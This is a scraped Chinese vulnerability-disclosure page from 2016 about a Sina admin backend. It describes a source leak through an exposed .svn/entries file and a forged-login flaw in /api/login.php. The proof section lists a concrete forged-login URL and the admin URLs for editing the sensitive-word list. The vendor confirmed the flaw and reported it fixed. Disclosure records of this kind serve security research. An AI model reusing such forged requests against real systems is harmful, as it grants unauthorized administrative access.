漏洞概要
关注数(24)
关注此漏洞
漏洞标题:新浪综合管理后台存在高危设计缺陷可获取管理权限(敏感词的添加/删除/修改等操作)
相关厂商:新浪
提交时间:2016-01-18 17:03
修复时间:2016-02-27 11:49
公开时间:2016-02-27 11:49
漏洞类型:敏感信息泄露
危害等级:高
自评Rank:10
漏洞状态:厂商已经确认
Tags标签:
无
漏洞详情
披露状态:
2016-01-18: 细节已通知厂商并且等待厂商处理中
2016-01-18: 厂商已经确认,细节仅向厂商公开
2016-01-28: 细节向核心白帽子及相关领域专家公开
2016-02-07: 细节向普通白帽子公开
2016-02-17: 细节向实习白帽子公开
2016-02-27: 细节向公众公开
简要描述:
RT
敏感词库的权限,weibo那次传播**广告是不是也是这个原因呢?
详细说明:
源:
http://admin.iask.sina.com.cn/.svn/entries信息泄漏漏洞(目前已修补)
看源码,发现一个地方可以伪造登陆;
/api/login.php处源码如下:
漏洞证明:
证明一下:
http://admin.iask.sina.com.cn/api/login.php?appid=1000&sign=13f069bbd9f3ab16&time=1554091094&ip=8.8.8.8&user=weibo_zhishi
看下成功设置了cookie:
http://admin.iask.sina.com.cn/api/print.php
http://admin.iask.sina.com.cn/filter/set_sensitive_vocabulary.php?type=%C8%AB%B2%BF&level=%C8%AB%B2%BF&own=&word=&Submit=%B2%E9%D5%D2关键词的修改删除操作:
这些是什么关键词呢?应该是敏感词库!还能更新~~222333
http://admin.iask.sina.com.cn/filter/control_set_for_ishare_content.php
http://admin.iask.sina.com.cn/filter/ishare_title_red.php
修复方案:
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:8
确认时间:2016-01-18 17:19
厂商回复:
感谢关注新浪安全,安全问题修复中。
最新状态:
暂无